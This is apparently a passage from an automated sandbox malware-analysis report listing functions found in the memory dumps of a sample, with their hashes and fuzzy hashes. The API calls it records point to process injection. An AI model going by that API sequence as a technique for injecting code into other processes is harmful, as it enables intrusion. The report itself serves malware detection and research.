Opcode Fuzzy Hash: c02820ea434f170db4d3d8d5182eb9f5449fb5e054f3f9526737b17006274402
Instruction Fuzzy Hash: 8C511834A10218DFD714DF69D898EAEBBF2FF48714F258069E506AB3A5CB75AC01CB40

Function 077A3244 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

Teq, xrefs: 077A3357
@, xrefs: 077A324C

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: @$Teq
API String ID: 0-2281163723
Opcode ID: 699cc1e05a951fd405ec280b27537735b7116d9cff58636ea75736ed32045910
Instruction ID: 3b3732eff1ff8a440e9fff372ea5afe01dffe75b0671eb4b712a57341480f17c
Opcode Fuzzy Hash: 699cc1e05a951fd405ec280b27537735b7116d9cff58636ea75736ed32045910
Instruction Fuzzy Hash: D841879160E3D14FE3035B3858243997FB1AF87154B1E02DBD192CF6E3D9198C0A83A6

Function 077A0746 Relevance: 2.0, Strings: 1, Instructions: 762COMMON

Download Yara Rule

Strings

Teq, xrefs: 077A079A

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 29fc1a4bed47569358c88440d2d5274aa1be0109bbd31593a814c3e8e2037b68
Instruction ID: 74d2dfd1ebcc119876f3c3c017c14bdc134785abe8e633cbd091540f0524e76a
Opcode Fuzzy Hash: 29fc1a4bed47569358c88440d2d5274aa1be0109bbd31593a814c3e8e2037b68
Instruction Fuzzy Hash: 97528F30F043148FDB48BB79E99535DBBB6AF84340F9085A9D449A37A4DF389C58CB92

Function 01379048 Relevance: 1.7, Strings: 1, Instructions: 462COMMON

Download Yara Rule

Strings

(oq, xrefs: 01379081

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-1999159160
Opcode ID: d74849aa7896e5f5b863744e44e9f350eb2c29848ad825f31aa3ebb9b9d4c4c4
Instruction ID: 31d67290735ebcca188693a140c97c914f98ebe6637bfb7d46542aafbb0ae3f3
Opcode Fuzzy Hash: d74849aa7896e5f5b863744e44e9f350eb2c29848ad825f31aa3ebb9b9d4c4c4
Instruction Fuzzy Hash: 23124D71600119DFCB25CF68C584BAEBBB2FF8832CF198659E406DB295C739E881CB55

Function 014EA890 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 014EAAE6

Memory Dump Source

Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 35b76be6fd7ce0219c08e8e67f1f6e245530058fe378a48dc291d2b0534955ec
Instruction ID: fdde246fb2a1969178662e7572c1ab975225aaf9085352e1b86e99b65c5fc065
Opcode Fuzzy Hash: 35b76be6fd7ce0219c08e8e67f1f6e245530058fe378a48dc291d2b0534955ec
Instruction Fuzzy Hash: EB712870A00B058FEB24DF6AD54475BBBF1BF88205F208A2ED48AD7B60D775E845CB91

Function 01377158 Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

G, xrefs: 01377608

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: 66b651ee6083d918c0d7a81d0d46178e398bb44f4578e165054d9c832e3266af
Instruction ID: 2a0d99c7ef97e6047b4e54618f6f006be35608b33ba9da60270139892dbde564
Opcode Fuzzy Hash: 66b651ee6083d918c0d7a81d0d46178e398bb44f4578e165054d9c832e3266af
Instruction Fuzzy Hash: ACE1BF70700209DFDB259F69D858B7E7BA6BBC8328F148429E506CB395DB78CC41CB91

Function 0780BD9B Relevance: 1.6, APIs: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0780BEAB

Memory Dump Source

Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f28ffdf2b1e9b90f471e31f6a83080d4b49a878994708ada6f067743311b5dd4
Instruction ID: a685df035898e2152faec2c33c58f92fc8328e8a15d4e5c4e4b43d37678bfadf
Opcode Fuzzy Hash: f28ffdf2b1e9b90f471e31f6a83080d4b49a878994708ada6f067743311b5dd4
Instruction Fuzzy Hash: DD41B0B68083CA8FD7018F69D8117CAFFF0AB1A226F24824AD4949B3D2D3395551CBE5

Function 08F0E640 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08F0E6D0

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8d4a53d20b89ea9a0c2bb01941c979b61c0b550843190f97881fd96cb8646bea
Instruction ID: 02bb9f8929d4f8f0fb3410c974b6c75134c25eca03553da34b42b5aab420d5c0
Opcode Fuzzy Hash: 8d4a53d20b89ea9a0c2bb01941c979b61c0b550843190f97881fd96cb8646bea
Instruction Fuzzy Hash: 20214671D003499FDB10CFA9C880BDEBBF5FF48310F10882AE918A7240D779A940DBA4

Function 014ECD5A Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014ECDE7

Memory Dump Source

Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f83d2a96caa26a5b8512de67097a65b19fda94af069ce6a59c89ef35a49e196e
Instruction ID: b42b9a68506baaeb981bedee36484ff2a7f74098858d28fa099e616854e718b4
Opcode Fuzzy Hash: f83d2a96caa26a5b8512de67097a65b19fda94af069ce6a59c89ef35a49e196e
Instruction Fuzzy Hash: 4721D2B5900248EFDB10CF9AD884ADEBFF4EB48220F14801AE918A7350C379A945CFA5

Function 08F0F030 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08F0F0AE

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 890f000a38cb90e9ecbb6c7b6ecd075cec4891a92b8cb691a224dd08087b31dd
Instruction ID: 07d83e12a012f64a43c1cb167759c6e1d7f0a6271e1ed68d7fd6bf8853fac79e
Opcode Fuzzy Hash: 890f000a38cb90e9ecbb6c7b6ecd075cec4891a92b8cb691a224dd08087b31dd
Instruction Fuzzy Hash: AC212571D003088FDB24DFAAC4857EEBBF4EB48314F14842ED559A7280CB799945CFA5

Function 08F0D818 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 08F0D896

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c40d343e939f432e8f6555843484c69f3bce8b815f66026e7f633f83d8f256e0
Instruction ID: ac3cb359c1fd849c348c5ec1231bb89ddba5c7ea4fefa96c04fd2192d9b4b2d8
Opcode Fuzzy Hash: c40d343e939f432e8f6555843484c69f3bce8b815f66026e7f633f83d8f256e0
Instruction Fuzzy Hash: 5B2134B1D003098FDB14DFAAC485BEEBBF4EB48314F24842ED559A7280CB789945DFA5

Function 014ECD60 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014ECDE7

Memory Dump Source

Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4a135ee607ebc9e6dad6b30052d18451234cc68582b393bec3d38d3d3f37b7e2
Instruction ID: 203e511387281211068f27555fd02844c958c84eb5495885e26b52019fdd6d78
Opcode Fuzzy Hash: 4a135ee607ebc9e6dad6b30052d18451234cc68582b393bec3d38d3d3f37b7e2
Instruction Fuzzy Hash: B221E3B5D00248DFDB10CF9AD884ADEBFF4EB48310F14801AE918A7350C379A944CFA5

Function 08F0ED90 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 08F0EE07

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4d61467944e7b6396ced0583869539ae1e28efd07f4c156b290e8d6cf58bce10
Instruction ID: 4651f76f7e402ca8f0c3db6195e8a15c12c11881dbba3369dc3b1d58fd1f1b6e
Opcode Fuzzy Hash: 4d61467944e7b6396ced0583869539ae1e28efd07f4c156b290e8d6cf58bce10
Instruction Fuzzy Hash: 04212371C002499FDB10DFAAC844BEEBBF5EF48220F10842AE519A7241CB799941DFA5

Function 08F04A40 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 08F04ABB

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 06c3794263f95f9153d6e111968a6041ef0a67eec69dcb6ce3bd40853660600e
Instruction ID: 1bc93ec5aa461ff89fbf76859fb1a439cc44a35de0c7cf4cc5860c160c33b1c8
Opcode Fuzzy Hash: 06c3794263f95f9153d6e111968a6041ef0a67eec69dcb6ce3bd40853660600e
Instruction Fuzzy Hash: AD2108B5D00249DFDB10CF9AC584BDEBBF4EB48314F108029E558A7651C3789545CFA9

Function 0627C5F8 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 0627C668

Memory Dump Source

Source File: 00000000.00000002.1923700244.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6270000_wva4mZuUb4.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: f98c41b17fb6a5e38acbcec1fafb8948a84a4241300b9f23cb697a0280545c13
Instruction ID: 463973b79aab73fb4dbf1d979416641120e4ad50c9ea7c8d1d6d4259644ff4dd
Opcode Fuzzy Hash: f98c41b17fb6a5e38acbcec1fafb8948a84a4241300b9f23cb697a0280545c13
Instruction Fuzzy Hash: 641138B5C0065A9FDB14CFAAC444BEEFBF4EB48310F10812AD818B7240D738AA45CFA5

Function 0780BE38 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0780BEAB

Memory Dump Source

Source File: 00000000.00000002.1927957430.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7800000_wva4mZuUb4.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9101978855446bab43cf9d94f29d924cfca754bfbbbc0937bc5e1f974c2ea4a0
Instruction ID: a772d8c5bf645764d824462b88031a9fc6a8372028f17696834bd4dad83e5ce8
Opcode Fuzzy Hash: 9101978855446bab43cf9d94f29d924cfca754bfbbbc0937bc5e1f974c2ea4a0
Instruction Fuzzy Hash: 3621E4B59002499FDB10DF9AC884BDEFBF4FB48320F10842AE958A7251D379A945CFA5

Function 08F04A48 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 08F04ABB

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7f2b84f609a5c0b64ec58a33065573500242efd9e53f17068510672bbd86f57b
Instruction ID: 75e1b3f537a4e397facef571b183d7aeacd2c1e25d90f4920486cbe437b01db1
Opcode Fuzzy Hash: 7f2b84f609a5c0b64ec58a33065573500242efd9e53f17068510672bbd86f57b
Instruction Fuzzy Hash: 622106B59002499FDB10CF9AC484BDEFBF4EB48314F108029E558A7651D378A944CFA5

Function 08F0DF00 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08F0DF6E

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d21ace5708072f3b3d86d5d5e0f516419b70ef0a3c9c28b3dbcd2fdd5b544364
Instruction ID: 70e7460ef6f6813723207b9954e342240785c58d0d35eb8ef3178e256ba3bd6b
Opcode Fuzzy Hash: d21ace5708072f3b3d86d5d5e0f516419b70ef0a3c9c28b3dbcd2fdd5b544364
Instruction Fuzzy Hash: A51156768003489FDB20DFAAC844BDEBBF5EF48314F108419E519A7250CB759900DFA5

Function 08F0F298 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 08F0F2FA

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c4c32248e9afcb44e07a24154370c8b721dbbcfc003ee9794ec7036f4aef8cac
Instruction ID: c40b755296b2805dc0d3f9342ab53136f5fee6fb1b19ed80ce0dbcc55ecc9825
Opcode Fuzzy Hash: c4c32248e9afcb44e07a24154370c8b721dbbcfc003ee9794ec7036f4aef8cac
Instruction Fuzzy Hash: B01128B5D003488FDB24DFAAC4457DEFBF4EB48224F24841DD519A7240CA79A944CFA5

Function 08F0E138 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 08F0F795

Memory Dump Source

Source File: 00000000.00000002.1928569047.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f00000_wva4mZuUb4.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 002c8af66f202ea02911679b3bd3dbc9a246c758727a902039eb9f1f982f6625
Instruction ID: e3f48a8216428f159200e6fdf01f9da11bad8c2ac43617e67697aaf0732afa5a
Opcode Fuzzy Hash: 002c8af66f202ea02911679b3bd3dbc9a246c758727a902039eb9f1f982f6625
Instruction Fuzzy Hash: D111F5B6800749DFDB20DF9AC485BDEBBF8EB48314F108459E558A7341C375A944CFA5

Function 014EAA80 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 014EAAE6

Memory Dump Source

Source File: 00000000.00000002.1908907115.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e0000_wva4mZuUb4.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3f7d0927befc68621001d9a82b7238049dc226f2f97eba9640536e95a37e8000
Instruction ID: 82b3b7db54d89f97ba6f00166c1accdf0c8c74c23260ec1cb6f1eca0f0fd3312
Opcode Fuzzy Hash: 3f7d0927befc68621001d9a82b7238049dc226f2f97eba9640536e95a37e8000
Instruction Fuzzy Hash: 53110FB6C003498FDB24CF9AC548BDEFBF4EB88214F20841AD419A7310C379A545CFA5

Function 01379848 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

4'q, xrefs: 013799FA

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: bdbc4f75a3a4e47783136045f70c4d9558b300959984bb02b7f22faaadef3cc1
Instruction ID: 2e841ca5944a2ba573d2096eec966935cffa2b6e0efd530681b788eef1de9074
Opcode Fuzzy Hash: bdbc4f75a3a4e47783136045f70c4d9558b300959984bb02b7f22faaadef3cc1
Instruction Fuzzy Hash: 37619F31304116DFEB24DF3DC884B6A7BE9AF8562C7054669E95ACB362DB39DC01CB50

Function 01379638 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

4'q, xrefs: 013796C3

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 669d0e164c4c0f8a2710f7188a857a50daed7975d614196f86a0695783ebb924
Instruction ID: f88064e5e50254ad03fa072b48e9913f72ccb5a26b322b9023ab8a6196255a9a
Opcode Fuzzy Hash: 669d0e164c4c0f8a2710f7188a857a50daed7975d614196f86a0695783ebb924
Instruction Fuzzy Hash: 7E4137756402458FCB25CF68C848BAE7BB5EF88329F110669E906CB3B1C774DD81CB61

Function 077A4234 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

43q, xrefs: 077A4333

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: 43q
API String ID: 0-4276051794
Opcode ID: 759d0ed504c45ed994ffe68dba996b54d99b0ed4e7dad637dff066506d1e3bd4
Instruction ID: 7a5112fc57502f9871fa7ffaf6df0e6562b875d063633df92a712deedd664c07
Opcode Fuzzy Hash: 759d0ed504c45ed994ffe68dba996b54d99b0ed4e7dad637dff066506d1e3bd4
Instruction Fuzzy Hash: 42115A6561E3C40FD31797756C242A93F76AF83264F0E45EBD5C1CB1E3C968480AC762

Function 00F41C88 Relevance: 1.3, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 00F41CE0

Memory Dump Source

Source File: 00000000.00000002.1906400077.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_wva4mZuUb4.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 4c507f1f52509febc22b00903944ef9e8eb7957fd2d389c9d9f33bf3574e0e60
Instruction ID: c31d7ca548134aef112c47524835cb0b39dd8eecb31943b42d3a6c6526ed71dd
Opcode Fuzzy Hash: 4c507f1f52509febc22b00903944ef9e8eb7957fd2d389c9d9f33bf3574e0e60
Instruction Fuzzy Hash: 3211E0B68002498FDB20DF9AC585BDEBBF4EB48320F20841AD958A7641D779A944CBA5

Function 077A3350 Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

Teq, xrefs: 077A3357

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: ba9408edd866e4fe58b9a65cd8aa9852fdd0e057a40e26c06dfa27d7a500898e
Instruction ID: 3bceb066104ff7e6d4b1a288a77d54d4a613a3b4dcfa10e81ce9b500453ad8c6
Opcode Fuzzy Hash: ba9408edd866e4fe58b9a65cd8aa9852fdd0e057a40e26c06dfa27d7a500898e
Instruction Fuzzy Hash: 75F0F6313001104FC608BB7DA464A7E7BEBAFC96203250069F106CF368CE65DC025396

Function 077A4308 Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

43q, xrefs: 077A4333

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID: 43q
API String ID: 0-4276051794
Opcode ID: baa209f9d31d1d4e6ceef411701663505175f2fc57b5f83e384b8a6f3d9a2f8a
Instruction ID: 39ad55cba62154678750f89a1b28e7beb3701aa4772365b88d37babeb1461b58
Opcode Fuzzy Hash: baa209f9d31d1d4e6ceef411701663505175f2fc57b5f83e384b8a6f3d9a2f8a
Instruction Fuzzy Hash: 41E02235B043800FD3195676A8202BE3B67FBC26A0B0984BFE882CB398DC348C0A4390

Function 077AE634 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33ef9431891e761b0562528278f1e3d3537867b628ddbeae0982c7fa340fd42d
Instruction ID: 5f8448e4f26b571309be24b033e470c4a792fa905e31c3fc44be63bf38b3346b
Opcode Fuzzy Hash: 33ef9431891e761b0562528278f1e3d3537867b628ddbeae0982c7fa340fd42d
Instruction Fuzzy Hash: 8E028970E152048FCB14BFB9E99929D7BF1BF88340F5049A9E846E3768DB389D44CB91

Function 077AD789 Relevance: .4, Instructions: 434COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4e341a1c49d52b2b9b90e37a5c455059ac1babb8afec45938b93bb771881a18
Instruction ID: e63d197ef224d3269e02104fca194b409417f16567559d6f9a8339ce41bb9928
Opcode Fuzzy Hash: f4e341a1c49d52b2b9b90e37a5c455059ac1babb8afec45938b93bb771881a18
Instruction Fuzzy Hash: 9CE10271B083008FD709BB7DD8A925A7FF1AF85310F4089AEE485D7799DA38D819C792

Function 077ACAD0 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d566908612bff31a3e3f9a44d4a513f8a0feb8cc08d75578018d1791ff260d1c
Instruction ID: edb6b2781548a5e7a1b0e3914f8224db9e4da262bcd19069712ef7ec804a80d5
Opcode Fuzzy Hash: d566908612bff31a3e3f9a44d4a513f8a0feb8cc08d75578018d1791ff260d1c
Instruction Fuzzy Hash: 9EE1A032B102008FC708BFBDE99966E7FB2AB84340F918969D945D3798DE38D859C791

Function 077A21F0 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33fdfe3aaf3241adbbb970e45ac14e5f1d5454386d506d4f158d171b8ec5bd7c
Instruction ID: 9c8712cab43487f43655b2ecdb2b6684e1d7216c5bd84e900fce0a419f32021c
Opcode Fuzzy Hash: 33fdfe3aaf3241adbbb970e45ac14e5f1d5454386d506d4f158d171b8ec5bd7c
Instruction Fuzzy Hash: 59D1D171B052048FDB08BBB9E8992AE7FB6FFC8350F54486AD545A3395DE388C0583A5

Function 077AE94B Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42c2a54211258b52d7ed371889dfcded6ced12b76f006a2b8ccb6eb4ec78214b
Instruction ID: c6136c400b9726d6620b131e311b8efb3cf233000197bd262262095389ffbe4e
Opcode Fuzzy Hash: 42c2a54211258b52d7ed371889dfcded6ced12b76f006a2b8ccb6eb4ec78214b
Instruction Fuzzy Hash: 15D12774E152048FCB14AFB9E59929DBBF1FF88340F504569E806E3768EB389D45CB50

Function 0137F940 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1370000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f9c2d3ee0ae2e39d704dc3510e0fe6096a5245ba4e577793a82fba099d03e5f
Instruction ID: 11c9ffb2ef1f10092f263023975f35a2e637c0a41f8a1fd287fae07b77aa30fb
Opcode Fuzzy Hash: 3f9c2d3ee0ae2e39d704dc3510e0fe6096a5245ba4e577793a82fba099d03e5f
Instruction Fuzzy Hash: 22B18271B106048BC704FBBEE99472F7BBAAB98310F504865E809E375CDE78DD1587A1

Function 077ACAC0 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1927859406.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77a0000_wva4mZuUb4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3718b8a064e50999dcfb74ce4ebaa4af57891c8c3d63accf2176fbf81dd612c0
Instruction ID: 36463c597e8f2c2ac12a77d6096ea82abe43e668043d12c1ce59f7dfad9d4970
Opcode Fuzzy Hash: 3718b8a064e50999dcfb74ce4ebaa4af57891c8c3d63accf2176fbf81dd612c0
Instruction Fuzzy Hash: 45B1B172B102108FC708FFB9E99966E7FF2AB84340F508969D945D3798DE38D84AC791

Function 0137A9D8 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908068005.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

